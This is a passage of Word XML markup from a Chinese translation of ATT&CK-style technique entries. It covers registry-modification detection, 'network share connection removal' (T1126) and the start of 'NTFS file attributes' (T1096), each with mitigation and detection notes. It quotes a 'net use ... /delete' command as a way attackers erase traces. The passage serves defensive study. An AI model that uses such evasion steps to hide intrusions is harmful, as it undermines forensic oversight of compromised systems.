        <w:t>通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B3E0C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7425"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="2F41BA95" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="48D81E09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="26052AA5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="181CEEE8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079FBA47" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15B9E899" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保为注册表配置单元设置了适当的权限，防止用户修改系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>组件的键来提升权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2905EC09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633CE01F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316EF0B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表的修改是正常的，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统的典型使用过程中都会发生。考虑对特定键启用注册表审核，以便在值发生更改时生成警报事件（事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4657</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）（尽管使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reghide</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他规避方法创建值时可能不会触发此事件）。更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注册表项以便</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动时加载与已知软件、补丁周期等不相关的软件是可疑的，在启动文件夹中添加或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>修改文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也是可疑的。更改还可能包括创建新服务和修改现有二进制路径来指向恶意文件。如果更改了与服务相关的条目，则随后很可能启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地或远程服务以执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08153BBB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和命令行参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注册表信息更改或删除动作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带有内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集信息。还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用了这些工具，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能还需要在操作系统中配置日志功能，以便收集必要的信息用于分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A11E98" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控与隐藏注册表项（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Reghide</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）相关联的进程、命令行参数和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用。调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>原生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RegDelNull </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具检查和清除恶意隐藏注册表项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F86C3" w14:textId="2E77157E" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>网络共享连接</w:t>
      </w:r>
      <w:r w:rsidR="0022754D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2F29FD1A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D819CA4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1126</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40630317" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="317A5615" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D453D78" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>已建立到远程系统的网络共享连接。访问级别取决于所使用账号的权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2453F645" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441B6818" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，网络抓包，认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A752EF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>取证分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C96C5AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78DF88F6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32964040" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享驱动器和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理共享连接时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以删除它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个示例实用工具，它可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net use \system\share /delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来删除网络共享连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492BACE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以删除无用的共享连接，从而清除其操作痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B949845" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2690D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A51DB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547106CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络共享连接可能很常见，具体取决于网络环境的使用方式。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net use</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令（与通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立和删除远程共享相关）的命令行调用，遵循检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理共享的最佳实践。系统之间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信量也可以被捕获和解码以查找相关的网络共享会话和文件传输活动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份认证日志可用于确定何时及通过哪个账号建立了认证的网络共享，并且可用于将网络共享活动与其他事件相关联来研究潜在的恶意活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F288A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件属性</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="790DC508" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3962FAD8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1096</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253DF99A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559D4736" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC1BA49" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTFS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分区硬盘</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C1449ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控、内核驱动程序、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、进程命令行参数</w:t>
            </w:r>
          </w:p>
